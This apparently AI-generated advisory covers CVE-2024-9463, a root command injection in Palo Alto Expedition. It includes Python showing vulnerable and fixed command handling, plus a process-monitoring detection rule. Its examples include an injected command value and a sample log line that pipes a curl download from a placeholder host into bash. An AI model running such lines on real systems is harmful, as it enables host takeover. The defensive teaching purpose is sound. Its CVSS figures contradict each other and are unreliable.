CVE-2024-9463

Analysis and mitigation of the Expedition vulnerability: HIGH (CVSS 7.5)

High-profile threat

Overview

Palo Alto Networks Expedition contains an OS command injection vulnerability caused by improper input validation. It allows unauthenticated remote attackers to execute arbitrary OS commands with root privileges on the Expedition host; no authentication or user interaction is required. The vulnerability was disclosed on October 9, 2024. CISA has listed CVE-2024-9463 as exploited in the wild; it is not currently known to be used in ransomware campaigns.

Technical details

Palo Alto Networks Expedition fails to validate and sanitize user input before passing it to OS command execution functions. Because that code path runs with root privileges, an unauthenticated remote attacker who injects shell metacharacters into the affected input gets arbitrary commands executed as root. The vulnerability is triggered by a single network request and requires neither prior authentication nor user interaction.
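The pattern described above, shown as an added illustrative example rather than Expedition's own code: a device name reaches a shell through string concatenation (the CWE-78 defect), next to an argv-only invocation that leaves metacharacters inert, and a hardened version that also enforces an allowlist. The `echo`-based command, the allowlist regex and the attacker payload are assumptions for the demonstration; the mechanics are the same for any command the application builds from user input.

```python
import re
import subprocess

# Assumed allowlist for a device/host name: letters, digits, dot, underscore, dash.
DEVICE_NAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def lookup_vulnerable(device_name: str) -> str:
    """Vulnerable (CWE-78): the command line is built by concatenation and
    handed to sh, so ';', '|', '$(...)' in device_name become new commands."""
    cmd = "echo device: " + device_name
    result = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    return result.stdout


def lookup_argv_only(device_name: str) -> str:
    """No shell: the input is passed as one argv element, so shell syntax is
    never parsed. The payload is printed literally instead of being executed."""
    result = subprocess.run(["echo", "device:", device_name],
                            capture_output=True, text=True, check=True)
    return result.stdout


def accepts(device_name: str) -> bool:
    """Allowlist check used by the hardened path (defence in depth on top of argv)."""
    return DEVICE_NAME_RE.fullmatch(device_name) is not None


def lookup_hardened(device_name: str) -> str:
    """Hardened: reject anything outside the allowlist, then invoke without a shell."""
    if not accepts(device_name):
        raise ValueError(f"rejected device name: {device_name!r}")
    return lookup_argv_only(device_name)


def injected(output: str, marker: str = "INJECTED") -> bool:
    """True when the marker appears on its own line, i.e. it ran as a separate command."""
    return marker in output.splitlines()


if __name__ == "__main__":
    payload = "fw-01; echo INJECTED"          # constructed attacker input
    print(lookup_vulnerable(payload), end="")  # prints "device: fw-01" then "INJECTED"
    print(lookup_argv_only(payload), end="")   # prints the payload literally
    print(lookup_hardened("fw-01"), end="")
    try:
        lookup_hardened(payload)
    except ValueError as exc:
        print("hardened path:", exc)
```

Passing an argv list without a shell is the fix that removes the injection primitive; the allowlist on top of it is what stops a valid-looking but hostile value from reaching a command that interprets its own arguments (for example an option starting with `-`).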

The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')) and CWE-20 (Improper Input Validation).

This section records a CVSS v3.1 base score of 9.8 (CRITICAL) with the vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, which conflicts with the 7.5 (HIGH) figure in the page title. The two cannot both be right, and the vector as written (changed scope with High confidentiality, integrity and availability impact) evaluates to 10.0 under the CVSS v3.1 formula, not 9.8, so at least one of the score and the vector is mis-transcribed. Confirm the figure against the vendor advisory and the NVD entry before using it for prioritisation; whichever applies, an unauthenticated, network-reachable command injection that runs as root should be handled as a critical issue.

Impact

Successful exploitation allows unauthenticated remote attackers to execute arbitrary operating system commands with root privileges on the affected system. This enables complete system compromise, including data theft, malware installation, lateral movement within the network, and system disruption. The root-level execution context means attackers can access all system resources, modify critical files, install backdoors, and potentially compromise other systems on the network.

Mitigation and workarounds

Upgrade Palo Alto Networks Expedition to version 1.2.48 or later, following Palo Alto Networks' standard upgrade procedure for your Expedition deployment. Take a backup and test the upgrade in a non-production environment before applying it to production systems. The following versions include the necessary fixes: Expedition 1.2.48 and later.

Temporary workarounds until the upgrade can be applied: restrict network access to the Expedition application with firewalls, VPNs or network segmentation so that only trusted networks and IP addresses can reach it; disable Expedition if it is not currently in use; and monitor Expedition logs and system logs for suspicious command execution patterns or unusual process activity, in particular shells or download tools spawned by the web server's service account.
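One way to implement the monitoring workaround, as an added example that is not part of the original advisory: run a simple rule over process-creation events and alert when the web server's service account spawns a shell, scripting interpreter or download tool, which is what a successful command injection in a PHP-backed web application looks like on the host. The `key=value` event format and the sample lines are constructed for this example (a real deployment would feed auditd `execve` records, Sysmon or an EDR export through the same logic), and the user and tool lists are assumptions to tune for the environment.

```python
import os
import re
import shlex
from dataclasses import dataclass

# Assumed service accounts a web application runs as on a Linux host.
WEB_SERVICE_USERS = {"www-data", "apache", "nginx", "httpd"}
# Assumed binaries a web app should not normally spawn: shells, interpreters, downloaders.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "python", "python3", "perl",
                       "curl", "wget", "nc", "ncat", "socat"}
# Shell chaining and substitution syntax, typical of injected payloads.
SHELL_CHAINING = re.compile(r"[;|&`]|\$\(")

# Constructed sample events (not a real Expedition log): timestamp then key=value pairs.
SAMPLE_EVENTS = """\
2024-10-10T09:15:02Z host=expedition user=www-data parent=apache2 cmd="php /var/www/html/index.php"
2024-10-10T09:15:03Z host=expedition user=www-data parent=php cmd="sh -c id"
2024-10-10T09:15:04Z host=expedition user=www-data parent=php cmd="sh -c 'curl http://203.0.113.10/x.sh | bash'"
2024-10-10T09:16:00Z host=expedition user=root parent=cron cmd="/usr/sbin/logrotate /etc/logrotate.conf"
2024-10-10T09:17:11Z host=expedition user=www-data parent=apache2 cmd="/usr/bin/php-cgi"
2024-10-10T09:18:30Z host=expedition user=www-data parent=php cmd="python3 -c 'import socket,os'"
"""


@dataclass
class Alert:
    timestamp: str
    user: str
    parent: str
    reason: str
    command: str


def parse_event(line: str) -> dict:
    """Split one event line into a dict; quoted values (the cmd field) stay intact."""
    tokens = shlex.split(line)
    if not tokens:
        return {}
    fields = {"timestamp": tokens[0]}
    for tok in tokens[1:]:
        if "=" in tok:
            key, value = tok.split("=", 1)
            fields[key] = value
    return fields


def command_binary(cmd: str) -> str:
    """Basename of the executed program, tolerant of unbalanced quotes in the command."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        argv = cmd.split()
    return os.path.basename(argv[0]) if argv else ""


def detect(events_text: str) -> list:
    """Return an Alert for every event where a web service account spawns a suspicious child."""
    alerts = []
    for line in events_text.splitlines():
        ev = parse_event(line)
        cmd = ev.get("cmd", "")
        user = ev.get("user", "")
        if not cmd or user not in WEB_SERVICE_USERS:
            continue
        binary = command_binary(cmd)
        if binary not in SUSPICIOUS_CHILDREN:
            continue
        reason = f"web service account {user} spawned {binary}"
        if SHELL_CHAINING.search(cmd):
            reason += " with shell chaining or a pipe"
        alerts.append(Alert(ev["timestamp"], user, ev.get("parent", "?"), reason, cmd))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.timestamp} [{alert.parent} -> {alert.user}] {alert.reason}: {alert.command}")
```

The rule deliberately keys on the service account rather than on a payload signature: an exploit that runs `sh -c id` and one that pulls a second stage with `curl | bash` both trip it, and the chaining check only raises the priority. On a patched host it is also a reasonable post-upgrade sanity check, since the workaround note above asks for exactly this activity to be watched.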

CISA recommendation: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Source: this report was generated by AI.

Related Palo Alto Networks vulnerabilities

No related vulnerabilities with identified affected products.